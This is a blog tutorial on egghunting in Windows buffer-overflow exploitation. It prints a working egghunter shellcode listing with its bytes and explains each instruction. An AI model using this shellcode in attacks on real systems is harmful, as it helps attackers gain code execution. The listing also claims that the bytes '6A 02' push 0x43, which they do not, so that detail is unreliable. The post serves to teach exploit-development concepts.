Exploit Dev: EggHunting Explained / D4mianWayne

EggHunting, if simply put, is a technique in exploit development which is used to search for a specific keyword in an application memory space to further aid in the exploit if there is a length restriction. Egg in this case refers to specific keyword/pattern and “hunter” as put you’re searching in all the accessible address space to find the pattern, hence the hunt.

Before we begin, we must understand the need of the egghunting technique. Consider a scenario where you are trying to exploit a buffer overflow but for some reason, you are unable to put the shellcode due to the length limitation of input (we will see this later in action). Given as an exploit developer, the end goal is always to get code execution by using any method possible.

Scenario like this is where creative thinking comes handy, let’s say you have another input field which can have your shellcode/payload but that buffer is not writing instruction pointer. Consider following example:

InputA -> Large buffer but does not trigger overflow
InputB -> This one is limited in length and triggers overflow

Here, if we were able to put our payload in InputA and somehow overwrite the instruction pointer to the address of InputA during the overflow trigger via InputB we can gain shellcode execution.

Following image shows it in a better way:

EggHunting Explained

This should clear it up but there’s always a part which confuses most is the part where this comes handy. To understand it better, we will do a hands-on practical to understand it in a deeper level. This is just to understand the fundamentals of egghunting technique so that once presented with an actual exploitation of this, it will be easier to make sense out of the overall process.

Now, we have following things cleared out:

Egghunting is used when the buffer space is limited and we are unable to execute our shellcode directly. (Shellcode in this case refers to the one which gives us reverse shell). For example, let’s say we are able to write overwrite 1056 bytes but the EIP is being overwritten at 1000 bytes, that leaves you with just 56 bytes of space to put shellcode which will not be possible compared to the vanilla buffer overflow, hence we make use of this technique to expand our control. (Given a simple shellcode from msfvenom is of >300 length)
This technique does not necessarily expects control over a second input field where our final shellcode will reside but it can also be on one single buffer but it depends how it parsed by the application and where the overflow is limited.
Lastly, the principle of this is to search into all the address space of the memory to find an “egg” (pattern) which we have specified and once found, it pass the identified address to the instruction pointer which will then execute the stored shellcode.

Analyzing the EggHunting Shellcode

There is a well known paper that explains the overall methodologies of egghunting and how it can be used, it was written by Skape. It is recommended to read it to understand two different ways the egghunting technique can be deployed but we will use the syscall technique as I prefer that and it is very simple to grasp.

Before we begin, I will be using the NtDisplayString syscall and the shellcode is supposed to work on Windows XP and the 0x43 is used to specify the NtDisplayString syscall. The reason we are using NtDisplayString is because as quoted by Skape himself: “The NtDisplayString system call is typically used to display text to the blue-screen that some people are (unfortunately) all too familiar with. For the purposes of an egg hunter, however, it is abused due to the fact that its only argument is a pointer that is read from and not written to, thus making it a most desirable choice.”

It makes sense as NtDisplayString function accepts one argument which is a pointer to memory and read the string from the memory:

NTSYSAPI 
NTSTATUS
NTAPI

NtDisplayString(
					  IN PUNICODE_STRING      String 
);

It is also a good thing to note that if this function gets a memory address which for some reason is not accessible, it will throw a STATUS ACCESS VIOLATION or 0xc0000005 value.

Here is one sample egghunting shellcode:

0x0000000000000000:  66 81 CA FF 0F    or    dx, 0xfff
0x0000000000000005:  42                inc   edx
0x0000000000000006:  52                push  edx
0x0000000000000007:  6A 02             push  43
0x0000000000000009:  58                pop   eax
0x000000000000000a:  CD 2E             int   0x2e
0x000000000000000c:  3C 05             cmp   al, 5
0x000000000000000e:  5A                pop   edx
0x000000000000000f:  74 EF             je    0
0x0000000000000011:  B8 77 30 30 74    mov   eax, 0x74303077
0x0000000000000016:  8B FA             mov   edi, edx
0x0000000000000018:  AF                scasd eax, dword ptr es:[edi]
0x0000000000000019:  75 EA             jne   5
0x000000000000001b:  AF                scasd eax, dword ptr es:[edi]
0x000000000000001c:  75 E7             jne   5
0x000000000000001e:  FF E7             jmp   edi

This is a classic EggHunter shellcode, assuming you know a little bit about assembly such as mov , pop and conditional jumps, there is two things that still stands out here:

scasd : This compares dword (4 bytes value) of eax with edi and sets the appropriate flags which is used for conditional jumps
int 0x2e : This instruction triggers a software interrupt, in x86 architecture the 0x2e is associated with system call. The value 0x2e is specified for system call, basically asking kernel to do some operation from user-mode. In simpler terms, there are specified syscalls a user can request kernel to perform and to do that one can use int 0x2e. There are many different syscalls that can be requested, the eax register holds an integer value which specifies the operation we are requesting. It is to be noted that the different integer values are assigned for different operation.

Let’s just assume that we have taken a control of EIP and somehow made the execution our egghunting shellcode, now I will walk you through how it works, we will break it down:

0x0000000000000000 : this line performs OR on the dx register with value of 0xfff , edx register is here to keep track of the memory address space.
0x0000000000000005 : this instruction increments the value of edx by 1.
0x00000000000000006 to 0x000000000000000a: First off, his pushes the value of edx to the stack and then pushes the value 0x43 to the stack as well, then it performs pop eax basically making the eax holds the value 0x43 which is for NtDisplayString syscall and finally it calls int 0x2e performing the syscall operation.
0x000000000000000c to 0x000000000000000f: Here, we check if the al register holds a value of 5 from the syscall result, if it does then it will pop the edx register and jump the first instruction again. By this point, it is safe to know that this is a loop where the shellcode keeps incrementing the edx value and checking if the value is equal to 5 or not, if it does keep continuing.

Note that the reason we just check 5 while the returned value is 0xc0000005 is because the al is a 8 bit register and refers to low-order 8 bit of eax hence it will contain 5
0x0000000000000011 to 0x0000000000000016 : Here, we are loading the value of our defined “egg” i.e. w00t but in little endian format (reverse order) is loaded to eax and then the edx (memroy space reference) value is moved to edi .
0x0000000000000018 to 0x0000000000000019 : Then the scasd instruction is called which is used to compare the edi and eax by default, hence it checks the value of our egg with whatever the value holds by edi ’s memory address. (remember it used [edi] which is for accessing the value stored at the memory pointed by edi ). Once the comparison is done, if the comparison fails the execution goes back to inc edx which increments page by 1 and the loop continues to check the access and then the values.
0x000000000000001b to 0x000000000000001e : This again checks the value hold by edi with our egg but is only called when the first scasd instruction found our w00t if not, it won’t even touch this piece of code but once the first scasd finds the egg, this instruction will check the next 4 bytes stored after the first identified w00t and if the comparison returns true meaning that the next w00t is found, a jmp edi instruction is called which will make the program to jump to the memory where the egg was found successfully executing our main shellcode.

At this point you are wondering why we have two calls of scasd , good question. the reason being is that during the exploitation phase we write 8 bytes of pattern/egg, in this our first stage shellcode looks like:

w00tw00t + shellcode

Having a unique 8 byte egg helps in not having any false positive during the analysis of the memory for finding this very egg.

Another is why instead of using scasd why not go with cmp , there are few reasons for that, first is that when writing a shellcode a rule of thumb is that less bytes of shellcode and since we already making use of eax , edi registers and scasd is specifically designed to compare double words (4 bytes) and by default it checks the eax and edi which helps in achieving that because we will have less unnecessary insturctions in our shellcode. Often times, you might have to tackle with bad characters and it is very good practice to use whatever good option is there and of course, given the shellcode actually searches through the memory space, you would want the shellcode to be more efficient hence the scasd

I hope you have understood how egghunting technique works and if required, you can now write your own egghunting shellcode or use an existing one and modify it according to your need.

Ayushman / D4mianWayne

Exploit Dev: EggHunting Explained

Analyzing the EggHunting Shellcode

References: